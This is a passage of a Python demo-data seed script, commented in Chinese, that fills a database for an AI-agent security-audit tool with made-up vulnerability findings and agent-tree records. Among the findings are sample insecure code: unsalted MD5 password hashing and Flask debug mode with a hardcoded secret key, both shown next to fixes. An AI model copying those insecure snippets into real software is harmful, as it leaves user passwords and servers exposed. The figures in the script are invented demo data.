"description": "在配置文件中发现硬编码的 API 密钥,经验证为示例配置模板中的占位符。",
"file_path": "app/config.py.example",
"line_start": 15,
"line_end": 18,
"code_snippet": '''# 示例配置文件 - 请复制为 config.py 并替换实际值
API_KEY = "your-api-key-here" # 请替换为实际密钥
SECRET_KEY = "change-this-secret" # 请替换为随机字符串''',
"status": FindingStatus.FALSE_POSITIVE,
"is_verified": False,
"verification_method": "代码审查 - 确认为示例配置模板",
"verification_result": {"is_example": True, "reason": "File is .example template, not production config"},
"suggestion": "确保 .example 文件不被误用,在 .gitignore 中排除实际配置文件",
"ai_confidence": 0.85,
"tags": ["false-positive", "configuration"],
},
{
"vulnerability_type": VulnerabilityType.WEAK_CRYPTO,
"severity": VulnerabilitySeverity.MEDIUM,
"title": "使用不安全的 MD5 哈希算法存储密码",
"description": "密码哈希使用了已被破解的 MD5 算法,没有使用盐值,容易受到彩虹表攻击和暴力破解。",
"file_path": "app/utils/crypto.py",
"line_start": 8,
"line_end": 12,
"function_name": "hash_password",
"code_snippet": '''import hashlib
def hash_password(password):
# 危险:使用不安全的 MD5 且无盐值
return hashlib.md5(password.encode()).hexdigest()''',
"status": FindingStatus.VERIFIED,
"is_verified": True,
"verification_method": "代码审查 - 确认使用弱哈希算法",
"suggestion": "使用 bcrypt、Argon2 或 PBKDF2 等专门的密码哈希算法",
"fix_code": '''import bcrypt
def hash_password(password):
# 修复:使用 bcrypt 进行安全的密码哈希
salt = bcrypt.gensalt(rounds=12)
return bcrypt.hashpw(password.encode(), salt).decode()
def verify_password(password, hashed):
return bcrypt.checkpw(password.encode(), hashed.encode())''',
"references": [
{"type": "CWE", "id": "CWE-327", "url": "https://cwe.mitre.org/data/definitions/327.html"},
{"type": "CWE", "id": "CWE-916", "url": "https://cwe.mitre.org/data/definitions/916.html"},
],
"ai_confidence": 0.97,
"cvss_score": 6.5,
"cvss_vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:N",
"tags": ["cryptography", "password-storage", "md5"],
},
{
"vulnerability_type": "security_misconfiguration",
"severity": VulnerabilitySeverity.LOW,
"title": "生产环境启用了调试模式",
"description": "Flask 应用在生产环境中启用了调试模式,可能泄露敏感信息和允许远程代码执行。",
"file_path": "app/__init__.py",
"line_start": 25,
"line_end": 28,
"code_snippet": '''# 应用配置
app = Flask(__name__)
app.debug = True # 警告:生产环境应禁用
app.secret_key = 'development-key' # 警告:应使用安全密钥''',
"status": FindingStatus.NEEDS_REVIEW,
"is_verified": False,
"suggestion": "在生产环境中禁用调试模式,使用环境变量配置",
"fix_code": '''import os
app = Flask(__name__)
app.debug = os.environ.get('FLASK_DEBUG', 'False').lower() == 'true'
app.secret_key = os.environ.get('SECRET_KEY', os.urandom(24))''',
"references": [
{"type": "CWE", "id": "CWE-489", "url": "https://cwe.mitre.org/data/definitions/489.html"},
],
"ai_confidence": 0.88,
"cvss_score": 5.3,
"cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"tags": ["configuration", "debug-mode", "information-disclosure"],
},
]
findings = []
for i, fdata in enumerate(findings_data):
verified_at = None
if fdata.get("is_verified"):
verified_at = task.started_at + timedelta(minutes=10 + i)
finding = AgentFinding(
id=str(uuid.uuid4()),
task_id=task.id,
vulnerability_type=fdata["vulnerability_type"],
severity=fdata["severity"],
title=fdata["title"],
description=fdata.get("description"),
file_path=fdata.get("file_path"),
line_start=fdata.get("line_start"),
line_end=fdata.get("line_end"),
function_name=fdata.get("function_name"),
code_snippet=fdata.get("code_snippet"),
source=fdata.get("source"),
sink=fdata.get("sink"),
dataflow_path=fdata.get("dataflow_path"),
status=fdata.get("status", FindingStatus.NEW),
is_verified=fdata.get("is_verified", False),
verification_method=fdata.get("verification_method"),
verification_result=fdata.get("verification_result"),
verified_at=verified_at,
has_poc=fdata.get("has_poc", False),
poc_code=fdata.get("poc_code"),
poc_description=fdata.get("poc_description"),
poc_steps=fdata.get("poc_steps"),
suggestion=fdata.get("suggestion"),
fix_code=fdata.get("fix_code"),
fix_description=fdata.get("fix_description"),
references=fdata.get("references"),
ai_explanation=fdata.get("ai_explanation"),
ai_confidence=fdata.get("ai_confidence"),
xai_what=fdata.get("xai_what"),
xai_why=fdata.get("xai_why"),
xai_how=fdata.get("xai_how"),
xai_impact=fdata.get("xai_impact"),
cvss_score=fdata.get("cvss_score"),
cvss_vector=fdata.get("cvss_vector"),
tags=fdata.get("tags"),
created_at=task.started_at + timedelta(minutes=5 + i),
)
finding.fingerprint = finding.generate_fingerprint()
findings.append(finding)
db.add(finding)
await db.flush()
print(f"✓ 创建了 {len(findings)} 个漏洞发现")
return findings
async def create_agent_tree_nodes(db: AsyncSession, task: AgentTask) -> list:
"""创建 Agent 树节点"""
nodes_data = [
{
"agent_id": "orchestrator-001",
"agent_name": "主控 Agent",
"agent_type": "orchestrator",
"parent_agent_id": None,
"depth": 0,
"task_description": "协调整体审计流程,分发子任务",
"knowledge_modules": ["security_patterns", "vulnerability_db"],
"status": "completed",
"result_summary": "成功协调完成安全审计,发现 8 个漏洞",
"findings_count": 8,
"iterations": 15,
"tokens_used": 12500,
"tool_calls": 25,
"duration_ms": 780000,
},
{
"agent_id": "analyzer-sql-001",
"agent_name": "SQL 注入分析 Agent",
"agent_type": "analyzer",
"parent_agent_id": "orchestrator-001",
"depth": 1,
"task_description": "检测和验证 SQL 注入漏洞",
"knowledge_modules": ["sql_injection_patterns", "database_security"],
"status": "completed",
"result_summary": "发现 1 个严重 SQL 注入漏洞并验证成功",
"findings_count": 1,
"iterations": 5,
"tokens_used": 8200,
"tool_calls": 18,
"duration_ms": 120000,
},
{
"agent_id": "analyzer-xss-001",
"agent_name": "XSS 分析 Agent",
"agent_type": "analyzer",
"parent_agent_id": "orchestrator-001",
"depth": 1,
"task_description": "检测和验证跨站脚本漏洞",
"knowledge_modules": ["xss_patterns", "frontend_security"],
"status": "completed",
"result_summary": "发现 1 个高危存储型 XSS 漏洞",
"findings_count": 1,
"iterations": 4,
"tokens_used": 6800,
"tool_calls": 12,
"duration_ms": 95000,
},
{
"agent_id": "analyzer-cmd-001",
"agent_name": "命令注入分析 Agent",
"agent_type": "analyzer",
"parent_agent_id": "orchestrator-001",
"depth": 1,
"task_description": "检测操作系统命令注入漏洞",
"knowledge_modules": ["command_injection_patterns", "shell_security"],
"status": "completed",
"result_summary": "发现 1 个严重命令注入漏洞",
"findings_count": 1,
"iterations": 4,
"tokens_used": 7100,
"tool_calls": 15,
"duration_ms": 110000,
},
{
"agent_id": "verifier-001",
"agent_name": "沙箱验证 Agent",
"agent_type": "verifier",
"parent_agent_id": "orchestrator-001",
"depth": 1,
"task_description": "在隔离沙箱中验证漏洞可利用性",
"knowledge_modules": ["exploitation_techniques", "poc_generation"],
"status": "completed",
"result_summary": "验证 6 个漏洞,排除 1 个误报",
"findings_count": 6,
"iterations": 8,
"tokens_used": 11080,
"tool_calls": 17,
"duration_ms": 180000,
},
]
nodes = []
for ndata in nodes_data:
node = AgentTreeNode(
id=str(uuid.uuid4()),
task_id=task.id,
agent_id=ndata["agent_id"],
agent_name=ndata["agent_name"],
agent_type=ndata["agent_type"],
parent_agent_id=ndata["parent_agent_id"],
depth=ndata["depth"],
task_description=ndata["task_description"],
knowledge_modules=ndata["knowledge_modules"],
status=ndata["status"],
result_summary=ndata["result_summary"],
findings_count=ndata["findings_count"],
iterations=ndata["iterations"],
tokens_used=ndata["tokens_used"],
tool_calls=ndata["tool_calls"],
duration_ms=ndata["duration_ms"],
created_at=task.started_at,
started_at=task.started_at + timedelta(seconds=10),
finished_at=task.completed_at,
)
nodes.append(node)
db.add(node)
await db.flush()
print(f"✓ 创建了 {len(nodes)} 个 Agent 树节点")
return nodes
async def main():
"""主函数"""
print("=" * 60)
print("创建 Agent 审计任务演示数据")
print("=" * 60)
# 创建数据库连接
engine = create_async_engine(settings.DATABASE_URL, echo=False, future=True)
async_session = sessionmaker(engine, class_=AsyncSession, expire_on_commit=False)
async with async_session() as db:
try:
# 获取演示用户
result = await db.execute(select(User).where(User.email == "demo@example.com"))
demo_user = result.scalars().first()
if not demo_user:
print("❌ 未找到演示用户 (demo@example.com)")
print("请先运行应用初始化数据库")
return
print(f"使用演示用户: {demo_user.email}")
# 创建或获取演示项目
project = await get_or_create_demo_project(db, demo_user.id)
# 创建 Agent 任务
task = await create_agent_demo_task(db, project, demo_user.id)
# 创建事件流
await create_agent_events(db, task)
# 创建漏洞发现
await create_agent_findings(db, task)
# 创建 Agent 树节点
await create_agent_tree_nodes(db, task)
# 提交事务
await db.commit()
print("=" * 60)
print("✅ Agent 演示数据创建完成!")
print(f" 任务 ID: {task.id}")
print(f" 项目: {project.name}")
print(f" 发现漏洞: {task.findings_count}")
print(f" 严重程度分布:")
print(f" - Critical: {task.critical_count}")
print(f" - High: {task.high_count}")
print(f" - Medium: {task.medium_count}")
print(f" - Low: {task.low_count}")
print("=" * 60)
except Exception as e:
await db.rollback()
print(f"❌ 创建失败: {e}")
import traceback
traceback.print_exc()
raise
if __name__ == "__main__":
asyncio.run(main())